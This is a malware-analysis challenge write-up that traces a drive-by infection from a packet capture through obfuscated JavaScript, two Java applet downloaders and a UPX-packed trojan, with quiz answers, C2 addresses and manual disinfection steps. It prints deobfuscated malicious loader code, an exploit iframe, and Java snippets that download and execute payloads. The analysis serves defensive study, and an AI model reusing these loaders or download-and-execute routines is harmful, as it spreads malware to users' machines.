Name: yulyul2003

Contents:
  1. Answers
  2. Short description of the infection flow
  3. Extracting files
  4. Details
     4.a. File xxx.xxx
     4.b. File true.php
     4.c. File q.jar
     4.d. File sdfg.jar
     4.e. File file.exe - Short analysis of the malware
  5. Simple manual disinfection

======================================================================
1. Answers
======================================================================

1. As part of the infection process, Ms. Moneymany's browser downloaded two Java applets. What were the names of the two .jar files that implemented these applets?
   q.jar
   sdfg.jar

2. What was Ms. Moneymany's username on the infected Windows system?
   ADMINISTRATOR

3. What was the starting URL of this incident? In other words, on which URL did Ms. Moneymany probably click?
   http://nrtjo.eu/true.php

4. As part of the infection, a malicious Windows executable file was downloaded onto Ms. Moneymany's system. What was the file's MD5 hash? Hint: It ends on '91ed'.
   5942BA36CF732097479C51986EEE91ED

5. What is the name of the packer used to protect the malicious Windows executable? Hint: This is one of the most popular freely-available packers seen in 'mainstream' malware.
   UPX

6. What is the MD5 hash of the unpacked version of the malicious Windows executable file?
   0F37839F48F7FC77E6D50E14657FB96E

7. The malicious executable attempts to connect to an Internet host using an IP address which is hard-coded into it (there was no DNS lookup). What is the IP address of that Internet host?
   213.155.29.144

======================================================================
2. Short description of the infection flow
======================================================================

The victim clicks http://nrtjo.eu/true.php (which contains the xxx.xxx JavaScript); the page downloads and instantiates two Java applets, q.jar and sdfg.jar. Each jar file can download the malware from the server and execute it.
Once the malware is executed it copies itself into the "C:\cleansweep.exe\" directory and extracts from its resources a file called config.bin, which contains the control server addresses. It hides itself by hooking NtQueryDirectoryFile and NtEnumerateValueKey. It sends information over HTTP in the URL string: connection status, user name, computer name, malware version and MD5, etc.

PS: The online status looks like it is checked by connecting to 213.155.29.144 on port 444. This connection is also used to send user information.

======================================================================
3. Extracting files
======================================================================

I used xplico (http://www.xplico.org/), a cool tool, to extract the files from infected.pcap.

======================================================================
4. Details
======================================================================

========================================
4.a. File xxx.xxx
========================================

    function ararata(reem,aanpry)
    {
        f2112=this;
        var xxy= f2112['eDv5aDlF'.replace(/[F15D\:]/g, '')];
        return xxy('r'+'e'+'e'+'m.r'+'ep'+'lace('+'/r00ts/g'+',aanpry)');
    }

    'eDv5aDlF'.replace(/[F15D\:]/g, '')                    = eval
    'r'+'e'+'e'+'m.r'+'ep'+'lace('+'/r00ts/g'+',aanpry)'   = reem.replace(/r00ts/g,aanpry)

Resulting function:
-----------------------------------------

    function ararata(reem,aanpry)
    {
        return reem.replace(/r00ts/g,aanpry);
    }

========================================
4.b. File true.php
========================================

    var QYDCtrO3jhsZAwQE=f555['eDv5aDlF'.replace(/[F15D\:]/g, '')];

    'eDv5aDlF'.replace(/[F15D\:]/g, '') = eval
    QYDCtrO3jhsZAwQE = eval

    var FMsXHWkm3otEzXWe=f777['unDe:s5c:aDp:eF'.replace(/[F15D\:]/g, '')];

    'unDe:s5c:aDp:eF'.replace(/[F15D\:]/g, '') = unescape
    FMsXHWkm3otEzXWe = unescape

Replacing functions:

    QYDCtrO3jhsZAwQE('v'+'a'+'r ag'+'la'+'va'+'nd = ara'+'ra'+'ta(b'+'bs'+'a,Vs'+'SdAy); ag'+'lava'+'nd = FMsXHWkm3otEzXWe(ag'+'la'+'v'+'an'+'d);');
    QYDCtrO3jhsZAwQE('v'+'ar p'+'w'+'dzra'+'a = d'+'oc'+'um'+FMsXHWkm3otEzXWe('%65%6e%74'));
    pwdzraa.write('<'+'s'+FMsXHWkm3otEzXWe('%63%72%69%70%74%3e'));
    pwdzraa.write('v'+'ar kkrzbF2Lwtu8qLL0 = FMsXHWkm3otEzXWe(ag'+'la'+'va'+'nd);QYDCtrO3jhsZAwQE('+'kkrzbF2Lwtu8qLL0);');

Result:

    eval('v'+'a'+'r ag'+'la'+'va'+'nd = ara'+'ra'+'ta(b'+'bs'+'a,Vs'+'SdAy); ag'+'lava'+'nd = unescape(ag'+'la'+'v'+'an'+'d);');
    eval('v'+'ar p'+'w'+'dzra'+'a = d'+'oc'+'um'+unescape('%65%6e%74'));
    pwdzraa.write('<'+'s'+unescape('%63%72%69%70%74%3e'));
    pwdzraa.write('v'+'ar kkrzbF2Lwtu8qLL0 = unescape(ag'+'la'+'va'+'nd);eval('+'kkrzbF2Lwtu8qLL0);');

    unescape('%65%6e%74')           = ent
    unescape('%63%72%69%70%74%3e')  = cript>

Concat and unescape:

    eval('var aglavand = ararata(bbsa,VsSdAy); aglavand = unescape(aglavand);');
    eval('var pwdzraa = document');
    pwdzraa.write('<script>');
    pwdzraa.write('var kkrzbF2Lwtu8qLL0 = unescape(aglavand);eval(kkrzbF2Lwtu8qLL0);');

Refactoring:

    var aglavand = ararata(bbsa,VsSdAy);
    aglavand = unescape(aglavand);
    document.write('<script>');
    document.write('var kkrzbF2Lwtu8qLL0 = unescape(aglavand);eval(kkrzbF2Lwtu8qLL0);');

Result
----------------

    kkrzbF2Lwtu8qLL0 = unescape('%0A%20%20document.write%28%22%3COBJECT%20id%3Djdf1%20height%3D0%20width%3D0%20classid%3Dclsid%3ACA8A9780-280D-11CF-A24D-444553540000%3E%3C%2FOBJECT%3E%22%29%3B%0A%20%20%20%20var%20ver%20%3D%20jdf1.GetVersions%28%29%3B%0A%20%20%20%20ver%20%3D%20ver.split%28%22%2C%22%29%3B%0A%09ver%20%3D%20ver%5B1%5D.split%28%22%3D%22%29%3B%0A%09ver%20%3D%20ver%5B1%5D%3B%0A%09if%20%28%28ver%20%3C%20%227.1.4%22%29%20%7C%7C%20%28ver%20%3C%20%228.1.7%22%29%20%7C%7C%20%28ver%20%3C%20%229.3%22%29%29%0A%09%7B%0A%09%09%20document.write%28%27%3Ciframe%20src%3D%22http%3A%2F%2Fnrtjo.eu%2F%2Fpdf.php%3Fspl%3Die%22%20width%3D%22173%22%20height%3D%22348%22%20frameborder%3D%220%22%3E%3C%2Fiframe%3E%27%29%3B%0A%09%7D%20%20%0A%20%20%20%20%09%0A')

which decodes to:

    document.write("<OBJECT id=jdf1 height=0 width=0 classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></OBJECT>");
    var ver = jdf1.GetVersions();
    ver = ver.split(",");
    ver = ver[1].split("=");
    ver = ver[1];
    if ((ver < "7.1.4") || (ver < "8.1.7") || (ver < "9.3"))
    {
        document.write('<iframe src="http://nrtjo.eu//pdf.php?spl=ie" width="173" height="348" frameborder="0"></iframe>');
    }

    CA8A9780-280D-11CF-A24D-444553540000 = Acrobat Reader

So the first way to exploit (install the malware) is via a PDF, but in this case the version of Acrobat Reader was not suitable.

After refactoring, true.php boils down to three infection paths:

1. via Acrobat Reader - not in this case, because of the Acrobat Reader version check (if ((ver < "7.1.4") || (ver < "8.1.7") || (ver < "9.3"))), or maybe the Acrobat Reader plug-in was not installed.
2. via sdfg.jar
3. via q.jar

Let's analyze each file:

========================================
4.c. File q.jar
========================================

This jar is loaded by an applet tag in true.php.

- It contains 2 classes:
  - AppletPanel.class
  - Main.class
- Next step is to decompile the classes with jad.
- The source code is obfuscated.
- After refactoring the code a little bit we obtain a class AppletViewer that contains the actual downloading and service registering code.
- AppletViewer is created and instantiated using the method defineClass(String name, byte[] b, int off, int len, ProtectionDomain protectionDomain) from class Class.
- The bytes that make up the class data are converted using some string replacement and byte manipulation.
Here is the function:

    public static byte[] PadSG6F(String s)
    {
        String s1 = s.replaceAll("h", "");
        byte abyte0[] = new byte[s1.length() / 2];
        for(int i = 0; i < s1.length(); i += 2)
            abyte0[i / 2] = (byte)((Character.digit(s1.charAt(i), 16) << 4) + Character.digit(s1.charAt(i + 1), 16));
        return abyte0;
    }

- Here is a snippet that sets the AppletViewer properties:

    String s4 = "u";
    String s5 = "c";
    String s6 = "d";
    Field field = class1.getField(s4);
    Field field1 = class1.getField(s5);
    Field field2 = class1.getField(s6);
    Object obj1 = class1.newInstance();
    field.set(obj1, s);
    field1.set(obj1, s1);
    field2.set(obj1, s2);
    obj1 = class1.newInstance();

  where:
    s  : http://nrtjo.eu//loading.php?spl=javadnw&
    s1 : 1
    s2 : 1

- After saving the class array to a file called AppletViewer.class and decompiling the class with jad we obtain the download code.
- The AppletViewer appends the Java version to the URL. The version format is created by the parseVersion(String s, int i) method.
- In my case the URL is http://nrtjo.eu//loading.php?spl=javadnw&J120006010
- In the infected.pcap case the download URL is http://nrtjo.eu//loading.php?spl=javadnw&J050006010
- The URL is not available anymore.
- The stream is saved in a temporary file. The extension is created as follows:

    if(j != 0)
        s2 = s2 + ".dl";
    else
        s2 = s2 + ".ex";

  where j = 1
- The service is registered using:

    s3 = "regsvr32 -s \"" + fileName + "\"";
    Runtime.getRuntime().exec(s3);

- That's all for the q.jar file.

========================================
4.d. File sdfg.jar
========================================

The applet tag in true.php loads this jar; from that tag we see that the applet class is myf.y.AppletX.

The myf/y directory has 3 classes:
- PX.class
- AppletX.class
- LoaderX.class

After decompiling the myf/y directory we see that the AppletX class is used to instantiate the LoaderX class.
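The decoding steps from sections 4.a/4.b (the padded names, the %XX fragments and the 'a'+'b' concatenation in true.php) and from 4.c (PadSG6F), as an added JavaScript example; this is not code from the write-up or from the samples, the function names are my own, and the class-file magic check is my addition.

```javascript
// Added example: the string decoding behind sections 4.a/4.b (true.php) and
// 4.c (q.jar), done on strings only, so nothing from the samples is executed.

// 4.b, layer 1: junk-padded names. 'eDv5aDlF' -> 'eval',
// 'unDe:s5c:aDp:eF' -> 'unescape' (the regex is the one used by true.php).
function stripPadding(padded) {
  return padded.replace(/[F15D\:]/g, '');
}

// 4.b, layer 2: %XX fragments glued into identifiers and markup,
// e.g. '%65%6e%74' -> 'ent'. Same result as unescape() for %XX input.
function decodePercent(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// 4.b, layer 3: eval('v'+'a'+'r ...') concatenation. Given the alias map
// recovered with stripPadding(), rewrite one obfuscated statement into the
// readable form shown in the write-up.
function deobfuscateStatement(stmt, aliases) {
  let out = stmt;
  for (const [alias, real] of Object.entries(aliases)) {
    out = out.split(alias).join(real);
  }
  // resolve unescape('...') applied to a plain literal
  out = out.replace(/unescape\('([^']*)'\)/g, (_, lit) => `'${decodePercent(lit)}'`);
  // fold 'a'+'b' into 'ab' until no adjacent literals remain
  let prev;
  do {
    prev = out;
    out = out.replace(/'([^']*)'\s*\+\s*'([^']*)'/g, "'$1$2'");
  } while (out !== prev);
  return out;
}

// 4.c: what PadSG6F() does: strip the 'h' padding and parse hex pairs into
// the bytes handed to defineClass(). The 0xCAFEBABE magic check is added so
// a wrong decode is noticed before the bytes are looked at any further.
function decodePaddedHex(s) {
  const hex = s.replace(/h/g, '');
  if (hex.length % 2 !== 0 || /[^0-9a-fA-F]/.test(hex)) {
    throw new Error('not a clean hex string after stripping the padding');
  }
  const bytes = Buffer.from(hex, 'hex');
  const isClass = bytes.length >= 8 && bytes.readUInt32BE(0) === 0xcafebabe;
  return { bytes, isClass, majorVersion: isClass ? bytes.readUInt16BE(6) : null };
}
```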
Next, the bootstrapPayload(s5, s6) method is called on the LoaderX instance:

    String s5 = getParameter("data");
    String s6 = getParameter("cc");
    if(s5 == null)
        s5 = "";
    LoaderX.instance.bootstrapPayload(s5, s6);

where:
    data = "http://nrtjo.eu//loading.php?spl=javad"
    cc   = "1"

The LoaderX class uses the same method as q.jar to create the myf.y.PX class via defineClass, but this time the class is embedded directly in the jar file. Next, the data and cc fields are set using reflection.

On run, the PX class builds the URL http://nrtjo.eu//loading.php?spl=javad0 and downloads the file to a temporary path created with:

    String s6 = (new StringBuilder()).append(System.getProperty("java.io.tmpdir")).append(File.separator).append(Math.random()).append(".exe").toString();

and then executes the file using:

    Runtime.getRuntime().exec(s6);

That's all for the sdfg.jar file. That's easy.

========================================
4.e. File file.exe - Short analysis of the malware
========================================

First of all, let's open the file in a hex editor. You can easily see the sections .UPX0 and .UPX1, so the file is packed with UPX.

Next thing to do is to unpack the file using UPX:

    upx -d file.exe

            File size         Ratio      Format      Name
       --------------------   ------   -----------   -----------
        82432 <-     68096    82.61%   win32/pe      file.exe

Packed file MD5:   5942BA36CF732097479C51986EEE91ED
Unpacked file MD5: 0F37839F48F7FC77E6D50E14657FB96E

In the unpacked file we can also see that there is another section named .rsrc (resources). We can extract this resource using Resource Hacker. It seems to be some kind of packed file; we will see later, after modifying its header, that it is a password-protected zip file.

I'm using IDA to disassemble the malware.
Most of the DLLs are loaded dynamically, with their names built on the stack by hard-coded mov instructions like this:

    loc_4034CF:                             ; jumptable 00402F18 case 11
        mov     [ebp+var_338], 'u'
        mov     [ebp+var_336], 'r'
        mov     [ebp+var_334], 'l'
        mov     [ebp+var_332], 'm'
        mov     [ebp+var_330], 'o'
        mov     [ebp+var_32E], 'n'
        mov     [ebp+var_32C], '.'
        mov     [ebp+var_32A], 'd'
        mov     [ebp+var_328], 'l'
        mov     [ebp+var_326], 'l'
        and     [ebp+var_324], 0
        lea     eax, [ebp+var_338]
        push    eax             ; Source
        lea     eax, [ebp+Dest]
        push    eax             ; Dest
        call    wcscpy
        pop     ecx
        pop     ecx
        jmp     loc_4035CB

Other DLLs imported this way: urlmon.dll, ws2_32.dll, ntdll.dll, shell32.dll, etc.

For the ring0 instructions the function LdrLoadDll is used. Basically the execution of a function looks like this:

    kernel32_IsWow64Process          (to get the dll path)
    ntdll_NtOpenFile                 (open the dll)
    ntdll_NtQueryInformationFile
    ntdll_NtCreateSection
    execute the method from the DLL  (each function has a hard-coded way to call it; almost every function has a wrapper to call it)
    ntdll_NtUnmapViewOfSection
    ntdll_NtClose                    (release the file)

The malware hooks some important functions to hide itself:

1. NtQueryDirectoryFile - to hide its directory ("C:\cleansweep.exe\") and files (cleansweep.exe, config.bin)
2. NtEnumerateValueKey - to hide its autorun registry key:
     Location: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
     Keyname:  cleansweep.exe
     Value:    C:\cleansweep.exe\cleansweep.exe

Other hooks are:
1. TranslateMessage
2. NtVdmControl
3. LdrLoadDll
4. InternetCloseHandle
5. KiFastSystemCall

The malware injects itself into the System and svchost.exe processes to remain resident. The process that started the infection exits.

The directory "C:\cleansweep.exe\" contains two files:
1. cleansweep.exe - the malware
2. config.bin - the configuration file that contains the URLs of its command server and other configuration options like the check interval.

The config.bin file is a modified zip file with a password. If we change the first two bytes to PK then it is a valid zip file.
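The header repair described above, as an added example (not code from the write-up): it puts 'PK' back into the first two bytes and then reads the ZIP local file header so you can confirm it really is an archive, and that the entry is flagged as encrypted, before trying the password. The sample input is a constructed stand-in for config.bin, not bytes from the real sample, and the function names are my own.

```javascript
// Added example: repair the mangled config.bin header (first two bytes -> 'PK')
// and parse the ZIP local file header that follows, so the "is it really a
// password-protected zip?" question is answered from the bytes, not assumed.
function repairAndInspect(blob) {
  const fixed = Buffer.from(blob); // work on a copy, keep the evidence intact
  fixed[0] = 0x50; // 'P'
  fixed[1] = 0x4b; // 'K'
  // local file header signature "PK\x03\x04" as little-endian 0x04034b50
  if (fixed.length < 30 || fixed.readUInt32LE(0) !== 0x04034b50) {
    return { isZip: false };
  }
  const flags = fixed.readUInt16LE(6);
  const nameLen = fixed.readUInt16LE(26);
  const extraLen = fixed.readUInt16LE(28);
  if (fixed.length < 30 + nameLen + extraLen) {
    return { isZip: false };
  }
  return {
    isZip: true,
    encrypted: (flags & 0x0001) !== 0, // bit 0 = traditional PKWARE encryption
    method: fixed.readUInt16LE(8),      // 0 = stored, 8 = deflate
    firstEntry: fixed.subarray(30, 30 + nameLen).toString('latin1'),
    repaired: fixed,
  };
}

// Constructed sample: one local file header for an entry "config.dat",
// flags=1 (encrypted), method=8, sizes and CRC zeroed, with the first two
// signature bytes overwritten the way the malware's config.bin is.
function sampleMangledConfig() {
  const name = Buffer.from('config.dat', 'latin1');
  const hdr = Buffer.alloc(30);
  hdr.writeUInt32LE(0x04034b50, 0);
  hdr.writeUInt16LE(20, 4);          // version needed to extract
  hdr.writeUInt16LE(1, 6);           // general purpose flags: encrypted
  hdr.writeUInt16LE(8, 8);           // compression: deflate
  hdr.writeUInt16LE(name.length, 26);
  hdr.writeUInt16LE(0, 28);          // no extra field
  const blob = Buffer.concat([hdr, name]);
  blob[0] = 0x00; blob[1] = 0x00;    // mangle the 'PK' signature
  return blob;
}
```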
The password for the zip file is in the malware exe file: E1DD562C92E0EBBEC606170E64B39DC4

    loc_4021E6:
        push    20h
        push    offset aE1dd562c92e0eb ; "E1DD562C92E0EBBEC606170E64B39DC4"
        lea     eax, [esi+edi]
        push    eax
        call    sub_401708

The config.bin archive contains one file named config.dat. config.dat contains the following links:

    http://freeways.in/11111/gate.php
    http://213.155.29.144/software/_statistiko/gate.php
    213.155.29.144:444

On my analysis date (12.05.2010) the "freeways.in" domain (IP: 212.252.32.20) is unreachable (from 93.186.112.22).

Those are the links that are used to send user information. The URL contains the following fields:

    guid = UserName!MachineName!
    ver  = MalwareVersion
    stat = IsOnline
    cpu  = CpuType
    ccrc = CustomCrc
    md5  = UnpackedVersionMd5
    ie   = Internet Explorer version
    os   = Windows version

In the infected.pcap it was:

    gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed HTTP/1.1\r\n

In my case it was:

    gate.php?guid=ADMINISTRATOR!xxxxx!B8CXXX99&ver=10084&stat=ONLINE&cpu=9&ccrc=5A4F4DF7&md5=0f37839f48f7fc77e6d50e14657fb96e

More could be said about the malicious executable, but maybe this will be the task of another puzzle.

========================================
5. Simple manual disinfection
========================================

1. Use a tool like IceSword (http://www.antirootkit.com/software/IceSword.htm) to edit the registry key "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cleansweep.exe".
2. Press the reset button. :)
3. Delete the "C:\cleansweep.exe\" directory.
4. Delete the "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cleansweep.exe" registry key.

This is the first time I'm writing about my analysis of malware, so sorry for the few words.

That's all folks!
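The gate.php check-in format from section 4.e, turned into a small log-matching routine as an added example (not part of the write-up): it picks the check-in out of web or proxy request lines and splits the fields so a defender can see which account, host and binary hash reported in. The log lines are constructed; only the query string on the third line is the one quoted from infected.pcap above. Function names are my own.

```javascript
// Added example: detect the malware's gate.php check-in in request logs and
// decode its fields. Constructed sample log; line 3 carries the query string
// quoted from infected.pcap in the write-up.
const SAMPLE_LOG = [
  'GET /index.html HTTP/1.1',
  'GET /software/update.php?ver=3 HTTP/1.1',
  'GET /software/_statistiko/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed HTTP/1.1',
];

// Fields the malware always sends (see the field list in 4.e); a gate.php
// request carrying all of them is treated as a check-in, a plain gate.php hit
// without them is not, to keep false positives on unrelated gate.php pages down.
const REQUIRED = ['guid', 'ver', 'stat', 'md5'];

function parseCheckin(requestLine) {
  const m = /^\w+\s+(\S*\/gate\.php\?(\S+))\s/.exec(requestLine);
  if (!m) return null;
  const params = new URLSearchParams(m[2]);
  if (!REQUIRED.every((k) => params.has(k))) return null;
  // guid is UserName!MachineName!<id>, per the write-up's field list
  const [user, machine, id] = params.get('guid').split('!');
  return {
    path: m[1].split('?')[0],
    user,
    machine,
    id,
    version: params.get('ver'),
    status: params.get('stat'),
    md5: params.get('md5').toLowerCase(),
    os: params.get('os') || null,
  };
}

// Returns the parsed check-ins found in an array of request lines.
function findCheckins(lines) {
  return lines.map(parseCheckin).filter((x) => x !== null);
}
```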